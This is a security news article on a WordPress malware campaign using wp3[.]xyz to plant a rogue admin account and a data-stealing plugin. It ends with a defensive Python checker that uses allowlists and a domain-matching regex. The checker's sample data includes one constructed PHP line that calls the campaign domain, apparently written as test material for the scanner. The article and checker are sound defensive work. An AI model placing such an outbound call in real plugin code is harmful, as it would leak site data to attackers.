A new malware campaign has compromised over 5,000 WordPress websites, allowing attackers to create unauthorized admin accounts, install malicious plugins, and steal sensitive data.
The attackers are leveraging the domain wp3[.]xyz to execute their malicious activities. Once a WordPress site is compromised, a rogue admin account named wpx_admin is created, with credentials embedded in the malicious script. The malware then installs and activates a plugin (plugin.php) downloaded from the same domain. This plugin is designed to collect sensitive data, including admin credentials and logs, which it sends to the attacker’s server disguised as image requests.
The campaign is highly organized, with the malware verifying key steps, such as confirming the rogue admin account’s creation and the plugin’s successful installation. However, the initial method used by the attackers to gain access to the websites remains unclear.
How to Protect Your Website
To safeguard against this malware, c/side recommends the following steps:
- Block the Domain: Use firewalls and security tools to block the domain wp3[.]xyz, which the malware uses for its operations.
- Review Admin Accounts and Plugins: Check your WordPress site for unauthorized admin accounts and unknown plugins. Remove any accounts or plugins you did not create immediately.
- Strengthen CSRF Protections: Implement robust Cross-Site Request Forgery (CSRF) defenses, such as unique token generation, server-side validation, and periodic token regeneration. Short expiration times for tokens can further enhance security.
- Enable Multi-Factor Authentication (MFA): Add an extra layer of security to admin accounts by enabling MFA, which can prevent unauthorized access even if credentials are stolen.
Website administrators are urged to act quickly to prevent further compromises and minimize the impact of this malware campaign.
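As an added example (not from the c/side report or this article), the "review admin accounts and plugins" step as a defender's check: it compares WP-CLI's JSON output against allowlists of known admins and plugins, and scans plugin source files for the campaign's domain. The usernames, plugin slugs and file contents below are constructed samples, and the allowlists are assumptions a site owner would supply.

```python
import json
import re
from pathlib import Path

# Indicators from the report above (the domain is de-fanged there as wp3[.]xyz).
IOC_DOMAIN = "wp3.xyz"
# Matches the domain written plainly, de-fanged (wp3[.]xyz) or with the dot removed.
IOC_PATTERN = re.compile(re.escape(IOC_DOMAIN).replace(r"\.", r"\W*"), re.IGNORECASE)


def unexpected_admins(user_list_json, allowed_admins):
    """Admin logins missing from the allowlist; input: wp user list --role=administrator --format=json"""
    found = {u["user_login"] for u in json.loads(user_list_json)}
    return sorted(found - set(allowed_admins))


def unexpected_plugins(plugin_list_json, allowed_plugins):
    """Plugin slugs missing from the allowlist; input: wp plugin list --format=json"""
    found = {p["name"] for p in json.loads(plugin_list_json)}
    return sorted(found - set(allowed_plugins))


def files_referencing_domain(sources):
    """Names of files (a {name: text} dict) whose content references the campaign domain."""
    return sorted(name for name, text in sources.items() if IOC_PATTERN.search(text))


def load_plugin_sources(plugin_dir):
    """Read every .php/.js file under wp-content/plugins into the dict the scanner expects."""
    files = (p for p in Path(plugin_dir).rglob("*") if p.suffix in (".php", ".js"))
    return {str(p): p.read_text(errors="ignore") for p in files}


# Constructed sample data standing in for WP-CLI output and plugin files on disk.
SAMPLE_USERS = json.dumps([{"ID": 1, "user_login": "siteowner", "roles": "administrator"},
                           {"ID": 42, "user_login": "wpx_admin", "roles": "administrator"}])
SAMPLE_PLUGINS = json.dumps([{"name": "akismet", "status": "active", "version": "5.3"},
                             {"name": "plugin", "status": "active", "version": "1.0"}])
SAMPLE_SOURCES = {
    "akismet/akismet.php": "<?php // legitimate plugin code",
    "plugin/plugin.php": "<?php @file_get_contents('https://wp3.xyz/' . $p);",
}

if __name__ == "__main__":
    print("unexpected admins:", unexpected_admins(SAMPLE_USERS, ["siteowner"]))
    print("unexpected plugins:", unexpected_plugins(SAMPLE_PLUGINS, ["akismet"]))
    print("files referencing IOC:", files_referencing_domain(SAMPLE_SOURCES))
```

On a real site, feed the two WP-CLI commands' output into the first two functions and `load_plugin_sources("wp-content/plugins")` into the third; any non-empty result needs a manual look.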
Bijay Pokharel